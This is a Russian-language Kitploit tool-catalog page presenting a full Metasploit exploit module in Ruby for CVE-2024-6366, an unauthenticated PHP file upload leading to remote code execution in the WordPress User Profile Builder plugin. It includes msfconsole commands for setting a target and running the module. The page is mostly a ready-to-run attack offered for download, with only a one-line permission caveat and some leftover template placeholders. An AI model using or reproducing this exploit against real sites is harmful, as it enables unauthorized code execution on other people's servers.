Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6366 — Metasploit-модуль эксплойта для CVE-2024-6366 — неаутентифицированная загрузка файла с удалённым выполнением кода в WordPress User Profile Builder до версии 3.11.8, загрузка и выполнение PHP-полезной нагрузки. | Kitploit
Инструменты/GitHubGitHub/abdurahmon3236/cve-2024-6366
Фреймворки для эксплойтовАнализ уязвимостейАнализ КодаЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubabdurahmon3236/cve-2024-6366

CVE-2024-6366

Metasploit-модуль эксплойта для CVE-2024-6366 — неаутентифицированная загрузка файла с удалённым выполнением кода в WordPress User Profile Builder до версии 3.11.8, загрузка и выполнение PHP-полезной нагрузки.

Репозиторий
142 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Чтобы создать модуль Metasploit для эксплуатации уязвимости RCE в плагине User Profile Builder для WordPress версии ниже 3.11.8, необходимо воспользоваться отсутствием надлежащей авторизации в функциональности загрузки медиафайлов. Вот как можно создать такой модуль Metasploit:

Модуль Metasploit

Сохраните следующий код как wordpress_user_profile_builder_rce.rb в директории modules/exploits/unix/webapp вашей установки Metasploit Framework.

root@kitploit:~
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress User Profile Builder Unauthenticated File Upload RCE',
      'Description'    => %q{
        This module exploits a vulnerability in the User Profile Builder WordPress plugin before version 3.11.8.
        The plugin does not have proper authorization, allowing unauthenticated users to upload media files via
        the async upload functionality. This can be leveraged to upload and execute a malicious PHP payload.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-6366'],  # Replace with the actual CVE identifier
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'WordPress User Profile Builder < 3.11.8', {} ]
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.body.include?('wp-content/plugins/user-profile-builder')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_payload = "<?php #{payload.encoded} ?>"
    data = Rex::MIME::Message.new
    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"async-upload\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.php\"")
    data.add_part('1', nil, nil, 'form-data; name="html-upload"')
    data.add_part('Upload', nil, nil, 'form-data; name="upload"')

    print_status("Uploading PHP payload...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-admin', 'async-upload.php'),
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s
    })

    if res && res.code == 200 && res.body.include?('.php')
      php_path = res.body.match(/(\/wp-content\/uploads\/[0-9]+\/[0-9]+\/.*?\.php)/)[1]
      print_good("Payload uploaded successfully: #{php_path}")

      register_files_for_cleanup(php_path)
      execute_command("#{php_path}")
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
    end
  end

  def execute_command(php_path)
    print_status("Executing PHP payload...")
    send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, php_path)
    })
  end
end

Инструкции по использованию

  1. Сохраните модуль: Сохраните модуль как wordpress_user_profile_builder_rce.rb в директории modules/exploits/unix/webapp вашей установки Metasploit Framework.

    root@kitploit:~
    /path/to/metasploit-framework/modules/exploits/unix/webapp/wordpress_user_profile_builder_rce.rb
    
  2. Загрузите Metasploit: Запустите Metasploit Framework, открыв терминал и выполнив:

    root@kitploit:~
    msfconsole
    
  3. Используйте новый модуль: В консоли Metasploit загрузите новый модуль эксплойта с помощью следующей команды:

    root@kitploit:~
    use exploit/unix/webapp/wordpress_user_profile_builder_rce
    
  4. Настройте и запустите: Установите необходимые параметры, такие как RHOSTS и TARGETURI. Затем запустите эксплойт.

    root@kitploit:~
    msf6 > use exploit/unix/webapp/wordpress_user_profile_builder_rce
    msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > set RHOSTS target_ip
    RHOSTS => target_ip
    msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > set TARGETURI /
    TARGETURI => /
    msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > run
    

Важные соображения

  • Убедитесь, что у вас есть соответствующие разрешения перед тестированием или эксплуатацией любых систем.
  • Этот модуль является базовым шаблоном и может потребовать изменений для работы с конкретной конфигурацией или для достижения конкретной цели.
  • Всегда тестируйте модуль в безопасной и контролируемой среде перед использованием на любых производственных системах.

Этот модуль Metasploit загружает вредоносный PHP-файл в уязвимую установку WordPress, а затем выполняет его для достижения удалённого выполнения кода. При необходимости скорректируйте нагрузку и модуль в зависимости от конкретного характера уязвимости и целевой среды.

Скачать инструмент